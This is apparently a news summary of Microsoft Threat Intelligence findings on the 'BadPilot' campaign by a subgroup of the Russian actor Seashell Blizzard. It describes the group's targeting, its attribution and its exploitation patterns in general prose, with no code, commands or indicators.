Microsoft has unveiled its research on a subgroup of the Russian state actor known as Seashell Blizzard, specifically focusing on the “BadPilot campaign.” This initiative has been active since at least 2021, employing a range of tactics to infiltrate and exploit Internet-facing infrastructure, thereby enabling the broader Seashell Blizzard operations to maintain a foothold in high-value targets across various sectors worldwide.
The subgroup’s operations have expanded significantly, moving beyond Eastern Europe to encompass a near-global targeting strategy. This shift reflects a strategic evolution, allowing Seashell Blizzard to engage in niche operations that align with Russia’s geopolitical objectives. The campaign has demonstrated a capacity for opportunistic access, utilizing stealthy techniques to collect credentials and facilitate lateral movement within compromised networks.
Notably, the subgroup has successfully penetrated sensitive sectors, including energy, telecommunications, and arms manufacturing, as well as government entities. Recent activities have indicated a particular focus on vulnerabilities in widely used software, such as ConnectWise ScreenConnect and Fortinet FortiClient EMS, which have allowed access to targets in the United States and the United Kingdom since early 2024.
Microsoft Threat Intelligence has observed that while some of the subgroup’s targeting appears opportunistic, the cumulative effect of these compromises provides Seashell Blizzard with a range of options to respond to evolving strategic goals. Since the onset of the conflict in Ukraine, there has been an uptick in targeting international organizations that are geopolitically significant or provide support to Ukraine, with at least three destructive cyberattacks attributed to this subgroup since 2023.
The operational patterns of Seashell Blizzard’s subgroup reveal a sophisticated approach to cyber intrusions, characterized by notable shifts in post-compromise tradecraft. This evolution poses a significant risk to organizations within the group’s strategic purview, necessitating heightened vigilance and robust incident response measures.
Who is Seashell Blizzard?
Seashell Blizzard is a high-impact threat actor associated with the Russian Federation, operating under the auspices of Russian Military Intelligence Unit 74455 (GRU). Their activities span a range of operations, from espionage to cyber-enabled disruptions, often manifesting as destructive attacks on critical infrastructure. Since its emergence in 2013, Seashell Blizzard has been linked to several high-profile incidents, including the notorious NotPetya attack.
The group’s operations are marked by a focus on critical infrastructure, particularly during military conflicts. Their persistent targeting of Ukraine since the onset of the invasion in 2022 underscores their role in supporting Russian military objectives. The subgroup’s ability to leverage diverse tradecraft and publicly available tools highlights its adaptability and sophistication in executing cyber operations.
Attribution assessment
Microsoft Threat Intelligence has established a clear link between the initial access subgroup and Seashell Blizzard, based on distinct patterns of exploitation and post-compromise activities. The subgroup’s consistent use of specific exploits and tooling allows for differentiation from other threat actors, reinforcing the assessment of its operational capabilities.
Scope of operations and targeting trends
The subgroup’s operations have evolved to encompass a wide array of sectors and geographical areas. Initially focused on Ukraine, the group’s activities have broadened to include significant targets in the United States, Canada, and the United Kingdom. This expansion reflects a strategic pivot, allowing Seashell Blizzard to capitalize on vulnerabilities across various regions and sectors.
The subgroup’s historical exploitation patterns suggest a methodical approach to achieving compromises at scale, often employing a “spray and pray” strategy to maximize the likelihood of accessing strategically valuable targets. This opportunistic approach is complemented by significant post-compromise activities when high-priority targets are identified.
Initial access subgroup opportunistically compromises perimeter infrastructure using published CVEs
Since late 2021, the subgroup has employed targeted operations to exploit vulnerable Internet-facing infrastructure, utilizing a consistent set of tactics, techniques, and procedures (TTPs) to establish persistence and lateral movement. Microsoft Threat Intelligence has identified at least three distinct exploitation patterns linked to this subgroup, highlighting its evolving operational lifecycle.
Exploitation patterns
The initial access subgroup has demonstrated three primary exploitation patterns:
Deployment of remote management and monitoring (RMM) suites for persistence and command and control (February 24, 2024 – present)
In early 2024, the subgroup began utilizing RMM suites to achieve persistence and command and control, marking a novel approach for Seashell Blizzard. This technique involved exploiting vulnerabilities in widely used software to deploy RMM agents, allowing the threat actor to maintain critical functions while minimizing detection risks.
Chisel, plink, and rsockstun to establish dedicated conduits into affected network segments.
Through the deployment of tunneling utilities like Chisel and rsockstun, the subgroup has established reverse tunnels to actor-controlled infrastructure, facilitating covert access to compromised networks.
Modification of infrastructure to expand network influence through credential collection (late 2021 – 2024)
In targeted operations, the subgroup has modified network resources to passively gather credentials, thereby expanding its access to sensitive information and target networks.
Indicators of compromise
Organizations should remain vigilant for specific indicators of compromise associated with Seashell Blizzard’s activities, including suspicious email addresses and the presence of tunneling utilities on affected systems.
References
For further insights and detailed reports on the threat landscape, organizations are encouraged to consult the Microsoft Threat Intelligence Blog and leverage Microsoft Defender tools to enhance their security posture.
